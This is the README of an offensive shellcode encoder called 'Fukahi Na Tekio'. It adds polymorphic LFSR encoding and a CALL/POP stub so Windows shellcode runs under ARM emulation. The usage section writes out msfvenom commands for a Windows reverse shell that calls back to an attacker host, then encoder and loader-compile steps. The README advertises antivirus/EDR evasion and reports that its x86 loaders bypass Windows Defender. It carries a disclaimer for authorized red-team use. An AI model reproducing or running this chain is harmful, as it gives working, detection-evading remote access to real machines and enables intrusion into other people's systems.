fukahi-na-tekio
README
█████▒█ ██ ██ ▄█▀▄▄▄ ██░ ██ ██▓ ███▄ █ ▄▄▄ ▄▄▄█████▓▓█████ ██ ▄█▀ ██▓ ▒█████
▓██ ▒ ██ ▓██▒ ██▄█▒▒████▄ ▓██░ ██▒▓██▒ ██ ▀█ █ ▒████▄ ▓ ██▒ ▓▒▓█ ▀ ██▄█▒ ▓██▒▒██▒ ██▒
▒████ ░▓██ ▒██░▓███▄░▒██ ▀█▄ ▒██▀▀██░▒██▒ ▓██ ▀█ ██▒▒██ ▀█▄ ▒ ▓██░ ▒░▒███ ▓███▄░ ▒██▒▒██░ ██▒
░▓█▒ ░▓▓█ ░██░▓██ █▄░██▄▄▄▄██ ░▓█ ░██ ░██░ ▓██▒ ▐▌██▒░██▄▄▄▄██ ░ ▓██▓ ░ ▒▓█ ▄ ▓██ █▄ ░██░▒██ ██░
░▒█░ ▒▒█████▓ ▒██▒ █▄▓█ ▓██▒░▓█▒░██▓░██░ ▒██░ ▓██░ ▓█ ▓██▒ ▒██▒ ░ ░▒████▒▒██▒ █▄░██░░ ████▓▒░
▒ ░ ░▒▓▒ ▒ ▒ ▒ ▒▒ ▓▒▒▒ ▓▒█░ ▒ ░░▒░▒░▓ ░ ▒░ ▒ ▒ ▒▒ ▓▒█░ ▒ ░░ ░░ ▒░ ░▒ ▒▒ ▓▒░▓ ░ ▒░▒░▒░
░ ░░▒░ ░ ░ ░ ░▒ ▒░ ▒ ▒▒ ░ ▒ ░▒░ ░ ▒ ░ ░ ░░ ░ ▒░ ▒ ▒▒ ░ ░ ░ ░ ░░ ░▒ ▒░ ▒ ░ ░ ▒ ▒░
░ ░ ░░░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░░ ░ ▒ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░ ▒ ░░ ░ ░ ▒
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░
============[Author:-Xyconix-0xXyc][不可避な適応]============
++++[“Inevitable adaptation”]++++
Proudly Engineered by Swiz Security LLC
++[v.1.0]++
Motivation Behind "Fukahi Na Tekiō"
An enhancement to my original SGN XOR Encoder that fixes x86/64 shellcode in emulated Windows ARM Environments (Prism), deemed Fukahi Na Tekio, or "Inevitable Adaptation" in Japanese.
Read about the full research and why I did it here.
TLDR; this was because my x86/64 shellcode was not working properly on emulated ARM (Prism) environments in Windows due to Shikata Ga Nai's fnstenv/GetPC "trick" not working correctly in an emulated context.
For some reason, EIP/RIP would always point to a near-null value, leading to a access violation (segfault for you Linux guys) because our shellcode value would be lost somewhere in memory.
This is because the Floating Point Unit (FPU) would not reliably repopulate the shellcode's address when the fnstenv instruction would be used (idk your guess is as good as mine, Windows is weird).
That looks something like this:
fcmovb st, st(5) ; Any FPU instruction
fnstenv [esp-0xc] ; Save FPU state to stack
pop ebp ; Grab saved EIP from FPU state
The solution? A CALL/POP techinque that is reliable and works just about anywhere. We simply POP our last known good location into a register and save it for when we are ready to CALL it later.
👀 How does it look?
Help/Options
Running with options:
Output:
Verifying different outcomes with each run:
Grab & Compile Loader:
Get a 🐚:
So, what changed from the last repo?
The people asked (actually nobody did, but I wanted to challenge myself further), so I did. This new update absolutely comes "pack-a-punched" right out of the box with things like:
- [✔️] Polymorphic Encoding Technique (different payload every time)
- [✔️] Implemented Linear Feedback Shift Register (LFSR)
- [✔️] Direct C-loader support and guidance for rapid testing
- [✔️] Support for eliminating loops (good for control flow and static AV/EDR evasion) which I deemed "unrolling"
- [✔️] Works with both x86/64 shellcode variants on ARM Windows environments using the native "Prism" emulator
Usage
x86 Use Case
1. Generate Shellcode:
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER_MACHINE_IP> LPORT=1337 -f hex
- Generate a Fukahi Na Tekio LFSR Encoded Payload here and generate a compact C-based Loader:
python3 fukahi-na-tekio-encoder.py <place_msfvenom_generated_shellcode_here> --mode noloop --full-loader --compact
- Compile into a
.exe:
i686-w64-mingw32-gcc-15.2.0.exe loader.c -o loader.exe -fno-stack-protector
x64 Use Case
1. Generate Shellcode:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_MACHINE_IP> LPORT=1337 -f hex
- Generate a Fukahi Na Tekio LFSR Encoded Payload here and generate a compact C-based Loader:
python3 fukahi-na-tekio-encoder.py <place_msfvenom_generated_shellcode_here> --mode noloop --full-loader --compact
- Compile into a
.exe:
gcc loader.c -o loader.exe -fno-stack-protector
⚠️ Disclaimer
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATIONAL PURPOSES ONLY
By downloading, using, or distributing this software, you acknowledge and agree to the following:
-
Authorization Required: You must have explicit, written authorization from the owner of any system you test with this tool. Unauthorized access to computer systems is a federal crime under the Computer Fraud and Abuse Act (CFAA) and similar laws worldwide.
-
No Liability: Swiz Security and Jacob Swinsinski provide this tool "AS IS" without warranty of any kind. We are NOT responsible or liable for any damages, legal consequences, criminal charges, or misuse arising from the use of this software.
-
Your Responsibility: You assume full responsibility for your actions. The creators and contributors of this project will not be held accountable for any illegal or unauthorized use.
-
Intended Use: This tool was developed for legitimate security research, penetration testing, red team operations, and educational purposes only.
-
Compliance: You agree to comply with all applicable local, state, federal, and international laws and regulations.
If you do not agree to these terms, do not download, use, or distribute this software.
"With great power comes great responsibility."
Known Issues
⚠️ Unfortunately, there is an issue right now that I am trying to figure out as to why x86 loaders bypass Win Def successfully, but x64 does not.
I'll be investigating this further and get back to you guys with an updated version of the encoder when I have time.
source code
viewer
// click a file to view source